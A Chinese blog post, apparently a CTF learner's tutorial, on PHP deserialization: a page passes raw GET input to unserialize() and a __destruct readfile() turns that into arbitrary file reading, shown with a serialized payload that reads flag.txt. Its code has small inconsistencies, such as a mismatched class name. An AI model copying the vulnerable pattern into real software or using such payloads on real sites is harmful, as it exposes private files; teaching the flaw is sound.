关于序列化与反序列化漏洞利用

最新推荐文章于 2022-03-13 21:37:08 发布
最新推荐文章于 2022-03-13 21:37:08 发布
阅读量1k 收藏 2
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzy2210/article/details/89436226
版权

0x0001自诉

之前在打ctf的时候,有一题是利用反序列化漏洞完成的,然而学艺不精,于是跑去学习反序列化漏洞。

0x0002关于序列化与反序列化以及漏洞的原因

序列化是将对象的状态信息转换为可以存储或传输的形式的过程 代码为: `serialize ( mixed $value )`

反序列化则相反,代码为:unserialize ( string $str )
如果只是这样,那么应该没有什么可以利用的漏洞。
然鹅,serialize ( mixed $value )unserialize ( string $str )这两个函数在使用时,会自动使用一些魔法函数,以及,如果在定义的类内存在魔法函数,也会自动调用

0x0003实例

首先构建一个序列化 
<?php
 class A{
    public $filename='F:\\phpstudy\\PHPTutorial\\WWW\\php\\a.txt';
}

$a = new A();
echo $a->filename.'<br />';

?>

结果在这里插入图片描述

那么,我们再加一个函数 __destruct ()呢

<?php
 class A{
    public $filename='F:\\phpstudy\\PHPTutorial\\WWW\\php\\a.txt';
    function __destruct(){
        $data = readfile($this->filename);
        echo $data;
    }
}

$a = new A();
echo $a->filename.'<br />';

?>

在这里插入图片描述
图中yinhui为内容,6是长度
会发生这样的事情是因为 __destruct 析构函数在一个类对象消失时, 会自动执行。
那么假设,其中其实还有一个反序列化函数

<?php
 class A{
    public $filename='F:\\phpstudy\\PHPTutorial\\WWW\\php\\a.txt';
    function __destruct(){
        $data = readfile($this->filename);
        echo $data;
    }
}

$a = new A();
echo $a->filename.'<br />';
$b = unserialize($_GET[a]);

?>

然后我们通过下列代码来序列化一个路径

<?php
 classB{
    public $filename='a.txt';
}

$a = new B();
$a->filename = 'F:\\phpstudy\\PHPTutorial\\WWW\\php\\flag.txt';
echo serialize($a);

?>

获得了:O:1:“F”:1:{s:8:“filename”;s:40:“F:\phpstudy\PHPTutorial\WWW\php\flag.txt”;}

再放到拥有反序列化函数的网页中运行
在这里插入图片描述看,我们的flag文件也被读出来了

阴晦
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
Java 反序列化之 XStream 反序列化
合天网安学院
06-25 649
XStream 是一个简单的基于 Java 库,Java 对象序列化到 XML,反之亦然(即:可以轻易的将 Java 对象和 XML 文档相互转换)。如何使用 XStream 进行序列化反序列化操作?
反序列化漏洞的利用
Zeker62的博客
08-23 1069
目录PHP序列化格式JAVA序列化格式操作序列化对象修改对象属性修改数据类型使用应用程序功能魔术方法注入任意对象小工具链使用预先构建的小工具链ysoserialPHP 通用小工具链使用记录的小工具链创建自己的漏洞利用PHP序列化格式 假设一个对象User具有以下属性: $user->name = "carlos"; $user->isLoggedIn = true; 序列化之后,对象...
ToString数据如何反序列化
luoxn28的专栏
03-08 2928
戳蓝字「TopCoder」关注我们哦!不知道小伙伴们有没有这样的困扰,平常开发中写单测,要mock一个复杂的对象,并且也知道了该对象的toString格式数据(比如从日志中获取),但是...
Java 序列化反序列化
刺猬先生
06-12 205
有时候我们需要重新生成一个对象,这个时候我们可以通过序列化反序列化来实现。使用对象输入输出流来实现。 import java.io.ObjectInputStream; import java.io.ObjectOutputStream; /** * 根据序列化反序列化重新生成一个对象 * @author ll * */ public class Serializer { ...
序列化反序列化漏洞详解
m0_55854679的博客
03-13 8764
文章目录小知识漏洞原理序列化反序列化函数解析序列化:serialize()函数反序列化 :unserialize()函数魔术方法pikachu靶场练习1靶场练习2总结 小知识 weblogic反序列化漏洞漏洞挖掘较难。 与变量覆盖一样,并不是说具体的漏洞,而是与它的具体代码有关。 === 【比较 数值相等、类型相等】 == 【比较,数值相等】 = 【赋值 赋予数值】 => 【键值分离】 -> 【类里面的方法调用或者传参】 漏洞原理 序列化: 游戏的
C#反序列化漏洞
m0_47968686的博客
08-20 1494
CVE-2020-0688反序列化漏洞 漏洞成因 漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥伪造__VIEWSTATE参数从而触发反序列化漏洞。 环境、工具 WinServer2016、Exchange Server2016、win10、dnspy 分析 default.aspx被解析,继承Page类(Page
反序列化(Unserialize)漏洞详解
qq_49422880的博客
09-28 9016
序列化反序列化漏洞分析   序列化(serialize) 就将对象的状态信息转换为可以存储或传输的形式的过程 在序列化期间,对象将当前的状态写入到临时或持久性的存储区 【将状态信息保存为字符串】。   反序列化(unserialize) 就是把序列化之后的字符串在转化为对象。 其实在序列化的过程中是没有任何的漏洞的,产生漏洞的主要的原因就是在反序列化的过程中,通过我们的恶意篡改会产生魔法函数绕过,字符逃逸,远程命令执行等漏洞,最早发现这些漏洞的大佬是真的牛。 一、简单的魔法函数 魔法函数 调用
java 反序列化漏洞 利用思路简介
whatday的专栏
08-01 1318
目录 序列化的过程 readObject方法 反射链 完成反序列漏洞实践 结论 之前听别人讲解反序列化漏洞听的晕乎乎的,刚脆就趁着周末研究一下反序列化漏洞,并且搭建实战环境实际操作了一把,明白了之后发现之前听的迷糊更多是因为对于反序列漏洞思路不够清晰,明白了反序列的流程之后,反序列化漏洞很好理解。 下面的内容,我将详细论诉反序列化漏洞的利用思路。 序列化的过程 这里梳理一下正常的序列化的流程,将一个类进行序列化存储成二进制文件,然后再将该文件进行反序列化生成对象。 首先新建一个新的us
序列化反序列化漏洞
niqiu320的博客
04-22 592
序列化反序列化 什么是序列化? 将对象的状态信息转换为可以存储或传输形式的过程(字符串)。在序列化期间,对象将其当前的状态写入到临时(内存)或持久性存储区(硬盘)。以后可以通过从存储区中读取或者反序列化对象状态,重新创建状态。 简单来讲,序列化就是把一个对象变成可传输的字符串,可以以特定的格式在进程之间跨平台、安全的进行通信。字符串包括,属性名,属性值,属性类型和该对象对应的类名。 对象序列化利于对象的 保存和传输 ,也可以让多个文件共享对象。将用户存储到临时或硬盘中(数据库),可以理解为一个拍快照,通
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果...
java反序列化漏洞利用工具Jboss&WebLogic;.rar
07-23
本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再...
2014年311教育学专业基础综合答案解析.pdf
04-24
教育学考研,考研真题,全国硕士研究生统一考试教育学专业基础综合真题及解析,311历年真题,参考答案,答案解析。教育学统考。
大语言模型安全测试方法
04-24
4月16日联合国日内瓦总部万国宫,由世界数字技术院(WDTA)与云安全联盟大中华区(CSA GCR)联合主办第27届联合国科技大会AI边会上,世界数字技术院(WDTA)发布了两项具有重要意义的国际标准:“生成式人工智能应用安全测试标准”和“大语言模型安全测试方法”。这是国际组织首次在生成式AI应用安全、大模型安全领域发布国际标准,为业界提供了统一的测试框架,标准的发布将对人工智能领域产生深远影响,推动人工智能技术的安全、可靠发展。 这两大标准由云安全联盟大中华区研究院副院长黄连金带领的专家团队编制而成,他们来自CSA大中华区、OpenAI、蚂蚁集团、谷歌、微软、亚马逊、英伟达、OPPO、科大讯飞、百度、腾讯、加州大学伯克利分校、芝加哥大学、香港科技大学等数十家单位,体现了业界的广泛协作与集体智慧。 云安全联盟大中华区主席、世界数字技术院执行理事长李雨航院士发布时介绍,“生成式人工智能应用安全测试标准”为测试和验证生成式AI应用的安全性提供了一个框架,特别是那些使用大语言模型构建的应用程序。它定义了人工智能应用程序架构每一层的测试和验证范围,确保AI应用各个方面都经过严格的安全性和合规性
基于ssm电商网站的设计与实现(部署视频)_kaic.zip
04-24
目 录 目 录 1 绪论 1.1 研究背景 1.2 目的和意义 1.3 论文结构安排 2 相关技术 2.1 SSM框架介绍 2.2 B/S结构介绍 2.3 MYSQL数据库介绍 3 系统分析 3.1 系统可行性分析 3.1.1 技术可行性分析 3.1.2 经济可行性分析 3.1.3 运行可行性分析 3.2 系统性能分析 3.2.1 易用性指标 3.2.2 可扩展性指标 3.2.3 健壮性指标 3.2.4 安全性指标 3.3 系统流程分析 3.3.1 操作流程分析 3.3.2 登录流程分析 3.3.3 信息添加流程分析 3.3.4 信息删除流程分析 4 系统设计 4.1 系统概要设计 4.2 系统功能结构设计 4.3 数据库设计 4.3.1 数据库E-R图设计 4.3.2 数据库表结构设计 5 系统实现 5.1用户信息管理 5.2 商品信息管理 5.3商品分类管理 5.1商品资讯管理 6 系统测试 6.1 系统测试的特点  6.2 系统功能测试 6.2.1 登录功能测试 6.2.2 添加类别功能测试 6.3 测试结果分析 结 论 致 谢 参考文献
Comfast CF-924AC V3无线网卡驱动
最新发布
04-24
https://editor.csdn.net/md/?articleId=137978326文章对应USB 1300M无线网卡驱动,使用方式请参考博文。本驱动为博文对应的RDK X3平台所用,其它平台根据博文链接下载源码编译。
2024-2030全球与中国实时老化测试市场现状及未来发展趋势.docx
04-24
2024-2030全球与中国实时老化测试市场现状及未来发展趋势
shiro反序列化漏洞利用
08-13
对于Shiro反序列化漏洞的利用,我可以提供一些基本信息。Shiro是一个Java安全框架,用于身份验证、授权、会话管理等功能。在Shiro中,存在一个反序列化漏洞,攻击者可以利用该漏洞执行远程代码。 攻击者通常会构造恶意的序列化数据,然后将其发送给目标应用程序。当应用程序对该数据进行反序列化时,恶意代码将被执行。这可能导致各种安全问题,包括远程命令执行、信息泄露等。 要利用Shiro反序列化漏洞,攻击者需要了解目标应用程序中使用的Shiro版本和配置。然后,他们可以使用一些已知的漏洞利用工具或自己编写代码来构造有效的恶意序列化数据。 为了防止Shiro反序列化漏洞的利用,开发人员应该及时更新Shiro框架版本,并遵循安全最佳实践。同时,应该限制对反序列化功能的访问,并对输入进行严格的验证和过滤,以防止恶意数据的注入。 请注意,利用漏洞法行为,并且可能导致严重的法律后果。所以,我强烈建议不要尝试利用任何漏洞,而是积极参与维护应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值